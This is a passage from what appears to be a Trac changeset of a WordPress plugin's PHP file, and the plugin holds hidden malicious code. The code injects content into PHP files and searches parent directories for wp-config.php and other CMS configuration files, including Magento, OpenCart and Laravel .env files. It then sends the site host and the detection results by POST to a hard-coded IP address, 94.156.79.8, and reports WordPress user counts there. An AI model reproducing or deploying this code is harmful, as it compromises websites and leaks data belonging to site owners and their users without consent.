    395     $custom_content = PHP_EOL . $dcd_ctnt . PHP_EOL; // Add new lines for separation
    396 
    397     try {
    398         // Read the existing file content
    399         $file_content = file_get_contents($file);
    400 
    401        
    402 
    403         $php_close_pos = strpos($file_content, '?>');
    404 
    405         if ($php_close_pos !== false) {
    406             $new_content = substr_replace($file_content, $custom_content . '?>', $php_close_pos, 2);
    407 
    408             // Write the modified content back to the file
    409             file_put_contents($file, $new_content);
    410 
    411         }
    412     } catch (Exception $e) {
    413         // Handle the exception
    414         // Optionally, revert to the backup file
    415        
    416         }
    417     }
    418     } catch (Exception $e) {
    419         continue; // Continue to the next file on error
    420     }
    421         if (strpos($file, 'wp-config.php') !== false) {
    422 
    423            $detected_cms['WordPress'] = true;
    424            $wp_config_paths[] = $file;
    425 
    426         } elseif (strpos($file, 'class-wc-settings.php') !== false) {
    427             // You may add a specific check for WooCommerce here if needed
    428             $detected_cms['WooCommerce'] = true;
    429             $wc_config_paths[] = $file;
    430         } elseif (strpos($file, 'env.php') !== false &&
    431             strpos($file, 'Composer') === false &&
    432             strpos($file, 'composer') === false &&
    433             strpos($file, 'Softaculous') === false) {
    434             // You may add a specific check for Magento here if needed
    435             // Read the content of the file
    436             $fileContent = file_get_contents($file);
    437 
    438             // Check if the content contains the string 'host' => '
    439             if (strpos($fileContent, "'host' => '") !== false) {
    440               $detected_cms['Magento'] = true;
    441               $mg_config_paths[] = $file;
    442               /*echo("MAGENTO\n\n\n");
    443               echo("MAGENTO\n\n\n");
    444               echo("MAGENTO\n\n\n");
    445               echo("MAGENTO\n\n\n");
    446               echo("MAGENTO\n\n\n");
    447               echo("MAGENTO\n\n\n");
    448               echo("MAGENTO\n\n\n");
    449               echo("MAGENTO\n\n\n");
    450               echo($file);
    451               echo($file);
    452               echo($file);
    453               echo($file);
    454               echo($file);
    455               echo("MAGENTO\n\n\n");
    456               echo("MAGENTO\n\n\n");
    457               echo("MAGENTO\n\n\n");
    458               echo("MAGENTO\n\n\n");
    459               echo("MAGENTO\n\n\n");
    460               echo("MAGENTO\n\n\n");
    461               echo("MAGENTO\n\n\n");
    462               echo("MAGENTO\n\n\n");*/
    463             }
    464 
    465         } elseif (strpos($file, 'config.php') !== false &&
    466             strpos($file, 'Composer') === false &&
    467             strpos($file, 'composer') === false &&
    468             strpos($file, 'Softaculous') === false) {
    469             if (strpos(file_get_contents($file), '$config[\'encryption_key\']') !== false) {
    470                 $detected_cms['OpenCart'] = true;
    471             }
    472         } elseif (strpos($file, 'parameters.php') !== false) {
    473             if (strpos(file_get_contents($file), 'prestashop') !== false) {
    474                 $detected_cms['PrestaShop'] = true;
    475             }
    476         } elseif (strpos($file, 'settings.php') !== false) {
    477             if (strpos(file_get_contents($file), 'drupal') !== false) {
    478                 $detected_cms['Drupal Commerce'] = true;
    479             }
    480         } elseif (strpos($file, '.yaml') !== false) {
    481             if (strpos(file_get_contents($file), 'Symfony\Component') !== false) {
    482                 $detected_cms['Symfony'] = true;
    483             }
    484         } elseif (strpos($file, '.env') !== false) {
    485             // You may add a specific check for Laravel here if needed
    486             $detected_cms['Laravel'] = true;
    487         } elseif (strpos($file, '.global.php') !== false) {
    488             // You may add a specific check for Zend Framework here if needed
    489             $detected_cms['Zend Framework'] = true;
    490         } elseif (strpos($file, '.dat') !== false) {
    491             $detected_dat_files[] = $file;
    492         }
    493     }
    494 
    495     // Convert the boolean values to strings
    496     foreach ($detected_cms as $cms => $detected) {
    497         $detected_cms[$cms] = $detected ? 'true' : 'false';
    498     }
    499 
    500     // Now $detected_cms array contains the names of detected CMS based on the configuration files found
    501     // And $detected_dat_files array contains the paths of detected .dat files
    502 
    503     // Read users from the database and count them for WordPress and WooCommerce
    504     $wordpress_users = $wpuserscount;
    505     //$woocommerce_users = get_woocommerce_user_count();
    506     $woocommerce_users = 000;
    507 
    508     // Perform POST requests to the endpoints with JSON data containing CMS detection and user counts
    509     $url1 = 'https://94.156.79.8/FCS';
    510     $url2 = 'https://94.156.79.8/CMSUsers';
    511 
    512     $data1 = [
    513         'host' => $_SERVER['HTTP_HOST'],
    514         'cms' => $detected_cms
    515     ];
    516 
    517     //print_r($detected_cms);
    518 
    519     // Send data to the endpoints using CURL
    520     send_post_request($url1, $data1);
    521     // Additional logic as needed
    522 }
    523 
    524 function getWPUsers(){
    525     global $wpuserscount;
    526     global $currdomain;
    527     // Read users from the database and count them for WordPress and WooCommerce
    528     $wordpress_users = $wpuserscount;
    529     //$woocommerce_users = get_woocommerce_user_count();
    530     $woocommerce_users = 000;
    531     $url2 = 'https://94.156.79.8/CMSUsers';
    532     $data2 = [
    533         'host' => $currdomain,
    534         'wordpress_users' => $wordpress_users,
    535         'woocommerce_users' => $woocommerce_users
    536     ];
    537 
    538     // Send data to the endpoints using CURL
    539     send_post_request($url2, $data2);
    540 }
    541 
    542 // Function to get WordPress user count from the database
    543 function get_wordpress_user_count() {
    544     // Your implementation to fetch user count from the WordPress database
    545     // Example:
    546     // $count = query_wordpress_database();
    547     // return $count;
    548     return 0;
    549 }
    550 
    551 // Function to get WooCommerce user count from the database
    552 function get_woocommerce_user_count() {
    553     // Your implementation to fetch user count from the WooCommerce database
    554     // Example:
    555     // $count = query_woocommerce_database();
    556     // return $count;
    557     return 0;
    558 }
    559 
    560 // Function to send POST request
    561 function send_post_request($url, $data) {
    562     $ch = curl_init($url);
    563     curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
    564     curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
    565     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    566     curl_setopt($ch, CURLOPT_HTTPHEADER, [
    567         'Content-Type: application/json',
    568         'Content-Length: ' . strlen(json_encode($data))
    569     ]);
    570     $response = curl_exec($ch);
    571     curl_close($ch);
    572     // Handle response as needed
    573 }
    574 global $wp_config_paths;
    575 $wp_config_paths = [];
    576 global $wc_config_paths;
    577 $wc_config_paths = [];
    578 global $mg_config_paths;
    579 $mg_config_paths = [];
    580 check_cms_configuration_files();
    581 
    582 function find_wp_configs(&$wp_config_paths, $depth = 0) {
    583     $current_directory = getcwd();
    584     $parent_directory = $current_directory;
    585 
    586     // Go back three parents
    587     for ($i = 0; $i < 3; $i++) {
    588         $parent_directory = dirname($parent_directory);
    589     }
    590 
    591     // Start the search from the parent directory
    592     find_wp_configs_recursive($parent_directory, $wp_config_paths);
    593 }
    594 
    595 function find_wp_configs_recursive($directory, &$wp_config_paths) {
    596     // Check if wp-config.php exists in the current directory
    597     $wp_config_file = $directory . '/wp-config.php';
    598     if (file_exists($wp_config_file)) {
    599         $wp_config_paths[] = $wp_config_file;
    600     }
    601 
    602     // Continue searching forward recursively
    603     $contents = scandir($directory);
    604     foreach ($contents as $item) {
    605         if ($item != '.' && $item != '..' && is_dir($directory . '/' . $item)) {
    606             find_wp_configs_recursive($directory . '/' . $item, $wp_config_paths);
    607         }
    608     }
    609 }
    610 
    611 function print_wp_config_paths() {
    612     global $wp_config_paths;
    613     if (empty($wp_config_paths)) {
    614         //echo "No wp-config.php files found.\n";
    615         $z = 0;
    616     } else {
    617         //echo "List of wp-config.php files:\n";
    618         foreach ($wp_config_paths as $wp_config_path) {
    619             //echo "$wp_config_path\n";
    620             $a = 0;
    621         }
    622     }
    623 }
    624 //print_wp_config_paths();
    625 
    626 find_wp_configs($wp_config_paths);
    627 foreach ($wp_config_paths as $wp_config_path) {
    628     pachamama($wp_config_path);
    629     getWPUsers();
    630     update_option('my_admin_init_function_run', 'yes');
    631 }
    632    
    633 }}
     19
    63420function installBlazeWidget()
    63521{   
Note: See TracChangeset for help on using the changeset viewer.